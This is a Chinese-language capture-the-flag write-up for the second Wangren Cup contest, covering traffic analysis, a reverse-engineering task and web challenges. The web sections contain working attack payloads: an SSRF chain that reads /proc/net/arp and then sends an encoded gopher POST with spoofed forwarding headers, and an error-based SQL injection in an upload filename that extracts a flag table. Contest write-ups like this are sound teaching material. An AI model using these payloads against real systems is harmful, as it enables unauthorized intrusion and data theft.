0%

第二届网刃杯网络安全大赛

第二届网刃杯网络安全大赛

下面前两个是iec和re的签到题目,写出来了,记录一下,后面的是web题目。

1.easyiec

下载附件,流量分析,tcp流追踪,得到flag!

2.freestyle

看到提示!查看反编译image-20220424132039321

看一下fun1和fun2,基本算数image-20220424132126518

最终得到两个key拼接得到md5(3327104),得到flag{31a364d51abd0c8304106c16779d83b1}

3.signin

File协议读取/etc/hosts得到内网ip

image-20220426140817667

ssrf,先构造payload找文件,?url=file:///proc/net/arp,image-20220426141805039

这样看不太直观,bp抓包看一下!

image-20220426141940924

172.73.23.100 ,172.73.23.1这两个ip试一下gopher协议

gopher://172.73.23.100:80/_%50%4f%53%54%25%32%30%2f%25%33%46%61%25%33%44%31%25%32%30%48%54%54%50%2f%31%2e%31%25%30%44%25%30%41%48%6f%73%74%25%33%41%25%32%30%31%37%32%2e%37%33%2e%32%33%2e%31%30%30%25%33%41%38%30%25%30%44%25%30%41%58%2d%46%6f%72%77%61%72%64%65%64%2d%46%6f%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%4f%72%69%67%69%6e%61%74%69%6e%67%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%52%65%6d%6f%74%65%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%52%65%6d%6f%74%65%2d%41%64%64%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%52%65%66%65%72%65%72%25%33%41%25%32%30%62%6f%6c%65%61%6e%2e%63%6c%75%62%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%25%33%41%25%32%30%33%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%54%79%70%65%25%33%41%25%32%30%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%25%30%44%25%30%41%25%30%44%25%30%41%62%25%33%44%31%25%30%44%25%30%41%25%30%44%25%30%41

post传一下得到flag!image-20220426142722264

4.upload

上传题的sql注入,随便上传抓包,发现正常图片可以上传,image-20220426144004144图片🐎也能,但是不能解析,所以没用,这样的话就得换个思路,题目提示是sqlyyds,此时也发现type是可控变量image-20220426144230637

将type改成ctf,然后测试一下filename有没有注入漏洞image-20220426144343631

加了个,出现报错,是报错注入,常规报错注入,没过滤啥,但是限制长度了,需要分段读flag

image-20220426145014807

image-20220426145045283

’ and updatexml(1,concat(0x7e,substr((select flag from flag ),1,30),0x7e),0x7e) and ’

flag{5937a0b90b5966939cccd36921c68aa}

5.ez_js

image-20220426145522906

image-20220426145536136得!就会这些,我太菜,最后一题不会,睡觉!💤

制作不易,如若感觉写的不错,欢迎打赏